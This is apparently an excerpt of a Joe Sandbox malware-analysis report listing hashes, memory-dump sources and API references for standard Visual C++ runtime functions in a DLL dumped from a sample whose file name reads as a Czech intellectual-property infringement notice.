                                                          • Opcode ID: 81c0e74cffb284a816101c243d1bed1b72f71bf4f2809c4c02358903d53355dc
                                                          • Instruction ID: fed3b5f9a04fc2194b3bbf763c4ba3aeea0c782ee9bef24bfde0f26b0fed089d
                                                          • Opcode Fuzzy Hash: 81c0e74cffb284a816101c243d1bed1b72f71bf4f2809c4c02358903d53355dc
                                                          • Instruction Fuzzy Hash: FF31B576A06305EFDB44DFA8DB45E9D73B4FB86324F124659E9109B2C0D731FA078660
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: operator+$Name::operator+
                                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                          • API String ID: 1198235884-2239912363
                                                          • Opcode ID: 89ffbf4dfcb491da8027f7456a0a2762d8839fd4f1c60ec3f7585115c5df24f5
                                                          • Instruction ID: dcedee7f8a06704882f99cd23b689e2fbedcde07ffd06b84a388ccf5d16b8eb5
                                                          • Opcode Fuzzy Hash: 89ffbf4dfcb491da8027f7456a0a2762d8839fd4f1c60ec3f7585115c5df24f5
                                                          • Instruction Fuzzy Hash: 374148B1C06309EFDF85CFA8C845FAE7BB5AF42318F02814AE5549B284D775B64ACB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::Name::operator+shared_ptr
                                                          • String ID: char $int $long $short $unsigned
                                                          • API String ID: 3919194733-3894466517
                                                          • Opcode ID: 9f4ba9543615b5ecaf5dc07d971a9bd0610b1f962c82dc38fe69b4763764f7e3
                                                          • Instruction ID: e42a663af3e345713d32c354bb7e7a3b569da8d41f07966af2b4f337d23ac455
                                                          • Opcode Fuzzy Hash: 9f4ba9543615b5ecaf5dc07d971a9bd0610b1f962c82dc38fe69b4763764f7e3
                                                          • Instruction Fuzzy Hash: 5A211975901209EFCB44CFA8C951FEEBBB4FF06319F01868AE421AB384D775A606CB50
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDFB065
                                                          • DName::operator+.LIBCMT ref: 6FDFB071
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                          • DName::operator+=.LIBCMT ref: 6FDFB12F
                                                            • Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9910
                                                            • Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9BDA
                                                            • Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524
                                                          • DName::operator+.LIBCMT ref: 6FDFB0EC
                                                            • Part of subcall function 6FDF5630: DName::operator=.LIBVCRUNTIME ref: 6FDF5651
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDFB153
                                                          • DName::operator+.LIBCMT ref: 6FDFB15F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                          • String ID: {for
                                                          • API String ID: 2795783184-864106941
                                                          • Opcode ID: 5c09b7011d17175d4820603034fb41d2b31d2ca1e5ac83dca66913eeba793e8d
                                                          • Instruction ID: 90b356e5bfb93af2d6fd5072d9b06868651c905847a85653157d226a922fb4c4
                                                          • Opcode Fuzzy Hash: 5c09b7011d17175d4820603034fb41d2b31d2ca1e5ac83dca66913eeba793e8d
                                                          • Instruction Fuzzy Hash: 404191B1A01349EFDB41DFA8C850F9E7BEAAB0B308F024459E196DB2C0D7397946C764
                                                          APIs
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA7E7
                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(6FDFA18F,6FDFA18F,00000010,?,00000000,00000000,?,?,?,?,?,?,6FDFA18F,?,?,00000000), ref: 6FDFA825
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(00000000,?,?,?,?,?,6FDFA18F,?,?,00000000,00000000), ref: 6FDFA82F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Decorator::getDimensionSigned__telemetry_main_return_triggeratol
                                                          • String ID: `template-parameter$void
                                                          • API String ID: 3224638273-4057429177
                                                          • Opcode ID: 71bb7498c18879cf3d27803b231292a39ef11d10231b3e13238fd659aba910d1
                                                          • Instruction ID: 54b62f931e5c8b16dc078b52f4511a8f23263dad7448903d812e31274807a33a
                                                          • Opcode Fuzzy Hash: 71bb7498c18879cf3d27803b231292a39ef11d10231b3e13238fd659aba910d1
                                                          • Instruction Fuzzy Hash: 13318071D01309DFEF44CBE4D844FEEBBB9AB49318F11402EE501A6180DB797A1A8B75
                                                          APIs
                                                            • Part of subcall function 6FDF65FD: Replicator::operator[].LIBCMT ref: 6FDF6669
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF6756
                                                          • DName::operator+.LIBCMT ref: 6FDF679C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::Name::operator+Replicator::operator[]
                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                          • API String ID: 583996491-2211150622
                                                          • Opcode ID: 965adb7be0a8dc35f573ed2c684d59748d354c0d0638e322f73141fb18acbf44
                                                          • Instruction ID: d27bbe04f35c9e694686fd6b82c86667f9f199d104ad68e533c97144ebe48030
                                                          • Opcode Fuzzy Hash: 965adb7be0a8dc35f573ed2c684d59748d354c0d0638e322f73141fb18acbf44
                                                          • Instruction Fuzzy Hash: 543128B8901309DFCF84CFA8C460BAE7BB4BB47348F018649D565DBA50C735B616CB40
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,6FDF4AED,6FDF2CB8), ref: 6FDF4B06
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FDF4B14
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FDF4B2D
                                                          • SetLastError.KERNEL32(00000000,?,6FDF4AED,6FDF2CB8), ref: 6FDF4B81
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 2b7c5934a89fa31bf9815648a6ac6ccb9557d99fb3191f92f48327357b3c4dc8
                                                          • Instruction ID: 383d05888ba4e118b285b2d5d1bf5d83129dc01b521f86d7c0ea3e8cc18a8bb8
                                                          • Opcode Fuzzy Hash: 2b7c5934a89fa31bf9815648a6ac6ccb9557d99fb3191f92f48327357b3c4dc8
                                                          • Instruction Fuzzy Hash: 4401963210BB219EEB8517F4EE88F563E96FB033F9712022DF5548A0D1EB527422D158
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDF69B2
                                                          • DName::operator+.LIBCMT ref: 6FDF6A05
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                            • Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524
                                                          • DName::operator+.LIBCMT ref: 6FDF69F6
                                                          • DName::operator+.LIBCMT ref: 6FDF6A56
                                                          • DName::operator+.LIBCMT ref: 6FDF6A63
                                                          • DName::operator+.LIBCMT ref: 6FDF6AAA
                                                          • DName::operator+.LIBCMT ref: 6FDF6AB7
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$shared_ptr
                                                          • String ID:
                                                          • API String ID: 1037112749-0
                                                          • Opcode ID: 57da6066638ddf49115b4492286c3c11627ec151bf009652d48864f570184248
                                                          • Instruction ID: 2084511c22e688195dfcdde52a71ef67829ea3aef7697332da1ac5a77656289d
                                                          • Opcode Fuzzy Hash: 57da6066638ddf49115b4492286c3c11627ec151bf009652d48864f570184248
                                                          • Instruction Fuzzy Hash: 2C5163B5901309EBDF45CFA4C855FEE7BB9EB09704F02815AE505A72C0EB34B645CBA0
                                                          APIs
                                                          • __TypeMatch.VCRUNTIME140(19930520,?,00000000), ref: 6FDF3DAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: MatchType
                                                          • String ID: MOC$RCC$csm$csm
                                                          • API String ID: 3879256720-1441736206
                                                          • Opcode ID: 89a5cb353a7e3f2209e377149814bcd141d7cbe5dfb72b680259369b4db4e575
                                                          • Instruction ID: 5cf9c39c4d97fece20c5f21f7b428fa103dae45392f844b218ac360e4fe9103a
                                                          • Opcode Fuzzy Hash: 89a5cb353a7e3f2209e377149814bcd141d7cbe5dfb72b680259369b4db4e575
                                                          • Instruction Fuzzy Hash: 27315935802705DFCBA08FA4C902F9AB3B4AF01319F170A5AC8925B191C375F647CBA3
                                                          APIs
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F14
                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F21
                                                          • memmove.VCRUNTIME140(?,00000000,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F59
                                                          • ___AdjustPointer.LIBCMT(?,?,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F72
                                                          • ___AdjustPointer.LIBCMT(?,?,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F95
                                                          • memmove.VCRUNTIME140(?,00000000,?,6FDFFB88,00000010,?,6FDF2DC3,6FE01088,?), ref: 6FDF2F9E
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: AdjustPointermemmove$__telemetry_main_return_triggerabort
                                                          • String ID:
                                                          • API String ID: 4025328792-0
                                                          • Opcode ID: 7ae0e629686cc6a2bc821b579ad249142d88f1fb68804c58c9759bbabeac09c9
                                                          • Instruction ID: 4d8fe051985d3177d0c32a576893f934d2a1c2faf682c7463d91bb8dbf791519
                                                          • Opcode Fuzzy Hash: 7ae0e629686cc6a2bc821b579ad249142d88f1fb68804c58c9759bbabeac09c9
                                                          • Instruction Fuzzy Hash: A941CC31A13782DFDB468F52C450FAA77B0AF0632EF12022EDC5597290E731F882CA90
                                                          APIs
                                                            • Part of subcall function 6FDFB175: Replicator::operator[].LIBCMT ref: 6FDFB1B2
                                                          • DName::operator=.LIBVCRUNTIME ref: 6FDF9D0F
                                                            • Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9910
                                                            • Part of subcall function 6FDF98A5: DName::operator+.LIBCMT ref: 6FDF9BDA
                                                          • DName::operator+.LIBCMT ref: 6FDF9CC9
                                                          • DName::operator+.LIBCMT ref: 6FDF9CD5
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF9D19
                                                          • DName::operator+.LIBCMT ref: 6FDF9D36
                                                          • DName::operator+.LIBCMT ref: 6FDF9D42
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                          • String ID:
                                                          • API String ID: 955152517-0
                                                          • Opcode ID: 0ea57b8a1dfdd9f7fd27f960842672e4516fcc08e6bbf6b42225dd71dce41eaa
                                                          • Instruction ID: 6aaf51059a81c0c6afc5a760f1e7a98828e5bb2bafa9d5bb8bdd56745274b865
                                                          • Opcode Fuzzy Hash: 0ea57b8a1dfdd9f7fd27f960842672e4516fcc08e6bbf6b42225dd71dce41eaa
                                                          • Instruction Fuzzy Hash: F031AEB5A06304DFCB58CFA8D850EAABBF9AF8A304F11841DE58697394D734B546CB20
                                                          APIs
                                                          • ___unDName.LIBVCRUNTIME(00000000,?,00000000,6FDF4710,6FDF4720,00002800), ref: 6FDF47FD
                                                            • Part of subcall function 6FDFB600: ___unDNameEx.LIBVCRUNTIME(?,00002800,6FDF4720,6FDF4710,00000000,00000000,?,?,6FDF4802,00000000,?,00000000,6FDF4710,6FDF4720,00002800), ref: 6FDFB619
                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000002), ref: 6FDF483C
                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000004,?,00000000), ref: 6FDF4859
                                                          • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6FDF487E
                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6FDF4888
                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6FDF4891
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name___unfree$EntryInterlockedListPushmallocstrcpy_s
                                                          • String ID:
                                                          • API String ID: 2809682464-0
                                                          • Opcode ID: 39462487c09307fdca256e9b07e8a626366d7f19607c47b7d988ccb92ddec84c
                                                          • Instruction ID: f66ade107b0d58429f7275f7310e5cad57de2971b5d2a271013419210db742e5
                                                          • Opcode Fuzzy Hash: 39462487c09307fdca256e9b07e8a626366d7f19607c47b7d988ccb92ddec84c
                                                          • Instruction Fuzzy Hash: 8121E031901345EFDB048F64CA44DAA7FB9EF47324B12806AE805DB201E732BA16CBA0
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6FDFB8B5
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6FDFB96E
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(?,00000001), ref: 6FDFB987
                                                          • __DestructExceptionObject.VCRUNTIME140 ref: 6FDFB98D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: CurrentDestructExceptionImageNonwritableObject___except_validate_context_record__telemetry_main_return_trigger
                                                          • String ID: csm
                                                          • API String ID: 1358989434-1018135373
                                                          • Opcode ID: a29eb2e8fff221f99050039c0ad43f5ee7ab4f8b3fe38678226f6412b7d2e141
                                                          • Instruction ID: b0d1982c986e1a1fad7f5c33a2507d1e88533fcf785b0a65d06c8aeaaca9e1a8
                                                          • Opcode Fuzzy Hash: a29eb2e8fff221f99050039c0ad43f5ee7ab4f8b3fe38678226f6412b7d2e141
                                                          • Instruction Fuzzy Hash: D1418134A0130AEBCB40CF69D844EAE7BB5EF45328F158155EC149B2D1D732BA16CBA1
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue), ref: 6FDF4CBE
                                                          • GetLastError.KERNEL32(?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue,?,?,6FDF4B19), ref: 6FDF4CC8
                                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,api-ms-,00000007,?,6FDF4C62,?,?,00000000,?,?,?,6FDF4D8D,00000002,FlsGetValue,6FDF13D4,FlsGetValue), ref: 6FDF4CDD
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6FDF4CF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLastwcsncmp
                                                          • String ID: api-ms-
                                                          • API String ID: 3100911417-2084034818
                                                          • Opcode ID: e6e7604d99afb91fbd21b90f8325b4ab448c9a0ff68aaf5dec5a04c8d657817f
                                                          • Instruction ID: 0f16069f4d79bd10b991aa7589ddf802e36946a90ea794d92a5cf6a8314b2a73
                                                          • Opcode Fuzzy Hash: e6e7604d99afb91fbd21b90f8325b4ab448c9a0ff68aaf5dec5a04c8d657817f
                                                          • Instruction Fuzzy Hash: C8E01A30244705FBEF502B60DE09F483FAAAF03BA1F118025F90DE8091DB67B575DA98
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,6FDF342E,?,?,?,?,?,?), ref: 6FDF34C9
                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,6FDF342E,?,?,?,?,?,?,?), ref: 6FDF35D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: EncodePointerabort
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1188231555-2084237596
                                                          • Opcode ID: 04ecd5115b399ade4d85f3f0c8959806607adc730ba0d667161e23e34678e38c
                                                          • Instruction ID: aeacb7a30909375ed2c7ce0de796dd41a4e4e4738d6ea9b21be09615c012fd66
                                                          • Opcode Fuzzy Hash: 04ecd5115b399ade4d85f3f0c8959806607adc730ba0d667161e23e34678e38c
                                                          • Instruction Fuzzy Hash: C7416AB1901209EFCF02CF94C981EDE7BB6BF89304F168099F909A7250D335EA52DB52
                                                          APIs
                                                          • _FindAndUnlinkFrame.VCRUNTIME140(?), ref: 6FDF3F14
                                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?), ref: 6FDF3F7E
                                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6FDF3F92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                                          • String ID: csm
                                                          • API String ID: 1567117672-1018135373
                                                          • Opcode ID: 21f08ba0169086a516a91c7ffde4c0bd8367c221ead652a5b93cabb1e95b1547
                                                          • Instruction ID: a3c2859cdc16797d642ccbbaec893a5c456bf81a3720fe6131aa42f91fc7f2a9
                                                          • Opcode Fuzzy Hash: 21f08ba0169086a516a91c7ffde4c0bd8367c221ead652a5b93cabb1e95b1547
                                                          • Instruction Fuzzy Hash: C931E339507301DF82889F66D545C0BB779BF1222A3A706D9E4256F2E2C731F943CBA6
                                                          APIs
                                                            • Part of subcall function 6FDF5203: pDNameNode::pDNameNode.LIBCMT ref: 6FDF5229
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF7942
                                                          • DName::operator+.LIBCMT ref: 6FDF7950
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name$Name::Name::operator+NodeNode::p
                                                          • String ID: void$void
                                                          • API String ID: 3257498322-3746155364
                                                          • Opcode ID: 2b4f8c644cce212f9677c24dcfa4a5940bb8d5d1d83c776052ae0ff04a9af0f6
                                                          • Instruction ID: 24145c29255b57b949c66d0b9c61074a06ee80d0fd9a685cd9b75843314d5905
                                                          • Opcode Fuzzy Hash: 2b4f8c644cce212f9677c24dcfa4a5940bb8d5d1d83c776052ae0ff04a9af0f6
                                                          • Instruction Fuzzy Hash: 51217A75C0120EEFDF44CFA4C851EEE7BB9EB06348F01815AE951A7280EB307646CBA0
                                                          APIs
                                                          • ___except_validate_jump_buffer.LIBVCRUNTIME ref: 6FDFB7D6
                                                          • RtlUnwind.KERNEL32(?,6FDFE372,80000026,00000000,?,?), ref: 6FDFE36D
                                                          • _local_unwind2.VCRUNTIME140(?,?,?), ref: 6FDFE3B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Unwind___except_validate_jump_buffer_local_unwind2
                                                          • String ID: 02CV
                                                          • API String ID: 3811726867-2950495812
